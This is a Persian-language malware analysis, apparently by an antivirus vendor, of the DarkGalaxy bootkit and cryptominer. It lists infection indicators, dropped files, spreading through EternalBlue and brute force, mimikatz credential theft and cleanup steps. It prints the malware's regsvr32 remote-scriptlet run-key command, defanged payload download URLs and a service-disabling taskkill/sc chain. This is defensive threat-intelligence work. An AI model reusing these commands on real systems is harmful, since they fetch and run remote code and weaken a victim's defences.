Rootkit.Win32.DarkGalaxy

شرح کلی

نوع: (BootKit)
اسامی بدافزار:
Rootkit.Win32.DarkGalaxy.a
درجه تخریب: بالا
میزان شیوع: متوسط
آسیب‌پذیری مورد استفاده: Bruteforce، EternalBlue

روت کیت (Rootkit) چیست؟

روت کیت‌ها بر عملکرد هسته سیستم عامل تاثیر مخرب می‌گذارند. این تغییرات می‌تواند باعث مخفی شدن عملکرد اصلی فایل‌ها، پردازه‌ها، سرویس‌های داخلی ویندوز و … شود. همچنین بدافزار ممکن است بدون اطلاع کاربر با اتصال به سرور ریموت اقدام به بروزرسانی فایل‌های خود نماید. از فعالیت‌های اصلی روت کیت‌ها می‌توان به تغییر MBR سیستم و ساخت درایورهای مخرب یا تغییر در نحوه عملکرد درایورهای سالم اشاره نمود.

بدافزار Darkgalaxy چیست؟

این بدافزار که با هدف استخراج ارز دیجیتال وارد سیستم قربانی می‌شود، با دانلود و بهره گیری از ابزارهای مختلف اقدام به فعالیت‌های مخرب بر روی سیستم و شبکه قربانی می‌کند. از جمله مهمترین فعالیت‌های این بدافزار می‌توان به دانلود نسخه‌های جدید و بروزرسانی فایل اصلی بدافزار، سرقت اطلاعات، استخراج ارز دیجیتال، تغییر DNS و اجرای بات نت Mirai بر روی شبکه قربانی اشاره نمود. این بدافزار علاوه بر کلاینت‌ها بر روی ابزارهای IoT نیز تاثیر می‌گذارد.

توضیحات فنی

بدافزار Darkgalaxy از جمله بدافزارهای Miner و از دسته BootKitها می‌باشد که کدهای مخرب خود را در بخش MBR قرار داده و در نتیجه قبل از بوت شدن و بالا آمدن سیستم عامل ابتدا کدهای بدافزار اجرا می‌شود. و همچنین با ایجاد دو WMIObject سبب دانلود و اجرای یکسری از فایل‌های مخرب می‌شود.

علائم آلودگی به بدافزار Darkgalaxy:

• بالا بودن پردازه‌ی lsmm.exe که جهت انجام عملیات Mining استفاده می‌شود
• وجود فایل‌های job با نام های Mysa1,Mysa2,… در مسیر %Windir%\System32\Tasks.
• وجود دو WMIObject به نام‌های ****youmm4 و****youmm3 در مسیر‌های root\cimv2 و root\subscription .
• وجود مقدار زیر در مسیرهای run رجیستری :

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\start

Data: regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll

شرح عملکرد فایل اصلی بدافزار :

با بررسی محتوای آبجکت WMI ایحاد شده توسط بدافزار روال اجرا و انتشار آن مشخص شد. بدافزار ابتدا با اتصال به دامین‌های مشخص اقدام به دانلود فایل‌های اصلی خود می‌کند.

hxxp://173.247.239.186/ok.exe
hxxp://173.247.239.186/upsupx.exe
hxxp://173.247.239.186/u.exe

این دامین‌ها هر جند وقت یکبار تغییر می‌کنند.
فایلok.exe یا Max.exe :
مسئول تغییر MBR دیسک سیستم قربانی می‌باشد.
فایل upsupx.exe :
فایلی با نام xpdown.dat را دانلود می‌کند. محتوای این فایل درواقع آدرس دانلود فایل bitcoin بدافزار می‌باشد.
فایل U.exe :
سبب تغییر DNS سیستم به دو مقدار 233.5.5.5 برایpreferred DNS server و 8.8.8.8 برای alternate DNS server می‌شود.
در ادامه بدافزار اقدام به دانلود لیست زیر می‌کند که هر کدام مسئول اجرای یکی از اهداف بدافزار هستند.

نام و مسیر ایجاد فایل مخرب عملکرد
%Windir%\system\downs.exe تغییر مجوزهای دسترسی فایل‌های مورد‌نظر بدافزار در سیستم
%Windir%\system\cab.exe فایل بروزرسان بدافزار
%Windir%\inf\msief.exe اجرا کننده بات نت mirai
%Windir%\debug\item.dat سرویس بدافزار
%Windir%\system\my1.bat دانلودر فایل up.txt

 

بعد از دانلود فایل‌های بالا، بدافزار طبق کد wmi خود اقدام به متوقف کردن پردازه‌های دیگر بدافزارهای Miner موجود در سیستم مثل bitminer,noutrino,… می‌کند تا به راحتی بتواند اعمال مخرب خود را در سیستم اجرا کند. به این طریق که پردازه‌ی فایل‌های svchost.exe ,wininit.exe ,csrss.exe ,WUDFHosts.exe, services.exe,taskhost.exe که در مسیری غیر از مسیر اصلی خود باشد را از طریق wmi حذف می‌کند.
همچنین علائم آلودگی که توسط نسخه‌های قبلی ایجاد شده را جهت به روزرسانی خود حذف می‌کند. این بدافزار سرویس AnyDesk (سرویس نرم‌افزار ریموت دسکتاپ AnyDesk ) را نیز متوقف می‌کند.
با توجه به اینکه فایل ماینر بدافزار با نام lsmosee.exe در سیستم قربانی باید ایجاد شود، تمام مسیرها و فایل‌های موجود در مسیر %Windir%\debug\lsmosee.exe و %Windir%\help\lsmosee.exe را حذف می‌کند تا نسخه جدید آن‌ها را جایگزین نسخه‌های قبلی کند.
Job هایی با نام‌های WindowsUpdate1, WindowsUpdate3, Windows_Update, Update, Update2, Update3, windowsinit, System Security Check, AdobeFlashPlayerو… را حذف می‌کند.
جهت جلوگیری از آلوده سازی سیستم قربانی به دیگر بدافزارها و مختل کردن عمل Mining , دسترسی‌های پورت‌هایی که برای انتقال فایل مورد استفاده قرار می‌گیرند از جمله پورت 445 و 139 را می‌بندد, سپس اقدام به تعریف policy جدید با نام win برای ipsec می‌نماید. به این ترتیب فقط کسانی که خودش بخواهد توانایی برقراری ارتباط با این سیستم را دارند.

با بررسی‌های صورت گرفته بر روی فایل، این فیلتر‌ها در سیستم عامل XP اعمال نمی‌شوند. در ادامه SMBDeviceEnabled را از طریق رجیستری Disable می‌کند.

فایل up.txt :
این فایل از طریق کدهای powershell، اطلاعات سیستم را که شامل local ip، public ip، میزان استفاده از پردازنده‌ها، مسیرفایل و commandline پردازه‌های در حال اجرا، نوع سیستم عامل و نسخه آن، ظرفیت HardDisk و username،domain و password سیستم که از طریق اجرای ابزار mimikatz بدست آمده در فایلی ذخیره کرده و آن را برای سرورهای بدافزار ارسال می‌کند.
فایل msief.exe :
• اجراکننده بات نت mirai
• غیرفعال کردن سرویس‌های خاص از جمله NlaSvc :

%Windir%\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled

• ساخت سرویسی با نام xWinWpdSrv
• استفاده از ابزار masscan برای بررسی پورت‌های 445، 80، 8000
• انتشار بدافزار از طریق تکنیک brute foce

بدافزار برای انتشار خود همچنین با استفاده از فایل csrs.exe اقدام به اجرای آسیب پذیری EternalBlue بر روی سایر کلاینت‌ها و ساخت Backdoor بر روی آن‌ها می‌کند.

روش مقابله و پاک‌سازی سیستم

آنتی ویروس پادویش این بدافزار را شناسایی کرده و از سیستم حذف می‌کند. جهت پیشگیری از آلودگی های احتمالی توسط بدافزارهایی که از آسیب‌پذیری EternalBlue استفاده می‌کنند، پیشنهاد می‌شود از وصله امنیتی ارائه شده توسط مایکروسافت ms17-010 استفاده کنید. بخش جلوگیری از نفوذ (IPS) آنتی ویروس پادویش این گونه آسیب‌پذیری‌ها را شناسایی کرده و از ورود آن به سیستم قربانی جلوگیری می کند.